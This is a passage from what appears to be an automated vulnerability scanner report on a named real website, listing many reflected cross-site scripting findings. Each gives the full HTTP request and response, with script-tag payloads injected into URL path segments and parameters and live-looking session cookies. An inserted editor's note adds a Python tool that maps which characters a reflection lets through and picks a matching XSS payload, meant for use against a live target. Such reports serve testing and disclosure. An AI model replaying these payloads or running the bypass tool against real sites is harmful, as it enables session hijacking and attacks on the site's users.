User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...9e0fd<a>67e6f7e5a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2330. http://www.resellerbase.com/detail/34/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d841c<script>alert(1)</script>435f586f5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=2&d841c<script>alert(1)</script>435f586f5db=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Search&opt=2&d841c<script>alert(1)</script>435f586f5db=1 was not found on this server.</p>
...[SNIP]...

2.2331. http://www.resellerbase.com/detail/34/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14ae0<a>f64fd909ad0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=214ae0<a>f64fd909ad0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Search&opt=214ae0<a>f64fd909ad0 was not found on this server.</p>
...[SNIP]...
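
Editor's note with an added example (not part of the XSS.CX report and not code from the target). The three "Firm" findings above, for the Submit3, keyword and opt parameters, report that a bare <a> tag came back intact but that the scanner could not land a full script payload, and they ask for manual examination. The sink is the same 404 page as in the "Certain" findings, so the useful manual step is to learn exactly which metacharacters survive the reflection in these values and then choose a payload that needs only the survivors. The probe format, the canary, the candidate payload list and both sample responses below are constructed to show the technique; the "filtered" response models a hypothetical filter that strips parentheses and entity-encodes quotes, which is not something the report establishes about this site.

```python
"""Added example: map which metacharacters a reflection preserves, then pick
a payload that fits. Responses are constructed; nothing was captured."""
import html

METACHARS = '<>"\'/()=;`'

def build_probe(canary: str) -> str:
    """Each metacharacter sits between two copies of the canary, so it can be
    located in the response even when its neighbours are stripped or rewritten."""
    return canary + canary.join(METACHARS) + canary

def survivors(body: str, canary: str) -> dict:
    """Map each metacharacter to 'intact', 'encoded', 'stripped' or 'altered'
    from what the server left between consecutive canaries; every entry is
    'absent' when the probe was not reflected at all."""
    start = body.find(canary)
    if start < 0:
        return {c: "absent" for c in METACHARS}
    segments = body[start:].split(canary)   # segments[0] is '' (leading canary)
    result = {}
    for i, ch in enumerate(METACHARS):
        seg = segments[i + 1] if i + 1 < len(segments) else None
        if seg == ch:
            result[ch] = "intact"
        elif seg == "":
            result[ch] = "stripped"
        elif seg is not None and html.unescape(seg) == ch:
            result[ch] = "encoded"
        else:
            result[ch] = "altered"
    return result

# Candidate payloads for a text context between tags, each with the
# metacharacters it cannot do without; most conventional first.
CANDIDATES = [
    ("<script>alert(1)</script>", set("<>()/")),
    ("<svg onload=alert(1)>", set("<>()=")),
    ("<svg onload=alert`1`>", set("<>=`")),
]

def pick_payload(surv: dict):
    """First candidate whose required metacharacters all came back intact."""
    usable = {c for c, state in surv.items() if state == "intact"}
    for payload, needs in CANDIDATES:
        if needs <= usable:
            return payload
    return None

# --- constructed responses -------------------------------------------------
CANARY = "7f3a9"
PROBE = build_probe(CANARY)

def sink(reflected: str) -> str:
    # Same shape as the 404 page quoted in the report, built locally.
    return ("<p>The requested URL /detail/34/search.php?keyword=search..."
            + reflected + " was not found on this server.</p>")

# 1: the probe comes back untouched (what the 'Certain' findings show)
BODY_OPEN = sink(PROBE)

# 2: hypothetical filter that strips parentheses and entity-encodes quotes
BODY_FILTERED = sink(PROBE.replace("(", "").replace(")", "")
                     .replace('"', "&quot;").replace("'", "&#x27;"))

if __name__ == "__main__":
    for name, body in (("open", BODY_OPEN), ("filtered", BODY_FILTERED)):
        s = survivors(body, CANARY)
        print(name, {c: v for c, v in s.items() if v != "intact"}, "->", pick_payload(s))
```

Against a live target the probe goes into the parameter under test and the response body replaces the constructed ones; a result of None from pick_payload means the surviving character set is too small for the listed candidates and the list, not the conclusion, should be extended.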

2.2332. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4f13<script>alert(1)</script>a3f5b990938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild4f13<script>alert(1)</script>a3f5b990938/34/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild4f13<script>alert(1)</script>a3f5b990938/34/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2333. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7304f<script>alert(1)</script>8b002ebc5f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/347304f<script>alert(1)</script>8b002ebc5f0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/347304f<script>alert(1)</script>8b002ebc5f0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2334. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b80b3<script>alert(1)</script>8827b82f346 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themesb80b3<script>alert(1)</script>8827b82f346/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themesb80b3<script>alert(1)</script>8827b82f346/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2335. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 444d9<script>alert(1)</script>e4ab716db8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos444d9<script>alert(1)</script>e4ab716db8b/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos444d9<script>alert(1)</script>e4ab716db8b/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2336. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ee19<script>alert(1)</script>ca0d86a290a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images8ee19<script>alert(1)</script>ca0d86a290a/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images8ee19<script>alert(1)</script>ca0d86a290a/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2337. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caeff<script>alert(1)</script>541c28a5f65 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/ratingcaeff<script>alert(1)</script>541c28a5f65/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/ratingcaeff<script>alert(1)</script>541c28a5f65/0.gif was not found on this server.</p>
...[SNIP]...

2.2338. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 80e58<script>alert(1)</script>c5d29fdfe41 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/rating/0.gif80e58<script>alert(1)</script>c5d29fdfe41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/rating/0.gif80e58<script>alert(1)</script>c5d29fdfe41 was not found on this server.</p>
...[SNIP]...

2.2339. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2b04<script>alert(1)</script>1288b446b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/rating/0.gif?b2b04<script>alert(1)</script>1288b446b8f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/rating/0.gif?b2b04<script>alert(1)</script>1288b446b8f=1 was not found on this server.</p>
...[SNIP]...

2.2340. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 533b8<script>alert(1)</script>d5acf314f5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail533b8<script>alert(1)</script>d5acf314f5d/34/vod-cash-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail533b8<script>alert(1)</script>d5acf314f5d/34/vod-cash-com-german.html was not found on this server.</p>
...[SNIP]...

2.2341. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57208<a>c02319a56df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3457208<a>c02319a56df/vod-cash-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3457208<a>c02319a56df/vod-cash-com-german.html was not found on this server.</p>
...[SNIP]...

2.2342. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 301b8<script>alert(1)</script>7548ec7ca75 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/301b8<script>alert(1)</script>7548ec7ca75 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/301b8<script>alert(1)</script>7548ec7ca75 was not found on this server.</p>
...[SNIP]...

2.2343. http://www.resellerbase.com/detail/35/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3170<script>alert(1)</script>5138f7e3fe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile3170<script>alert(1)</script>5138f7e3fe0/35/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile3170<script>alert(1)</script>5138f7e3fe0/35/ was not found on this server.</p>
...[SNIP]...

2.2344. http://www.resellerbase.com/detail/35/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fbb85<script>alert(1)</script>8f42548ecf9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35fbb85<script>alert(1)</script>8f42548ecf9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35fbb85<script>alert(1)</script>8f42548ecf9/ was not found on this server.</p>
...[SNIP]...

2.2345. http://www.resellerbase.com/detail/35/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21458<script>alert(1)</script>bbce6fa5561 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/?21458<script>alert(1)</script>bbce6fa5561=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/?21458<script>alert(1)</script>bbce6fa5561=1 was not found on this server.</p>
...[SNIP]...

2.2346. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/awempire-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93b86<script>alert(1)</script>ee17908cb97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail93b86<script>alert(1)</script>ee17908cb97/35/awempire-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail93b86<script>alert(1)</script>ee17908cb97/35/awempire-com.html was not found on this server.</p>
...[SNIP]...

2.2347. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/awempire-com.html

Issue detail

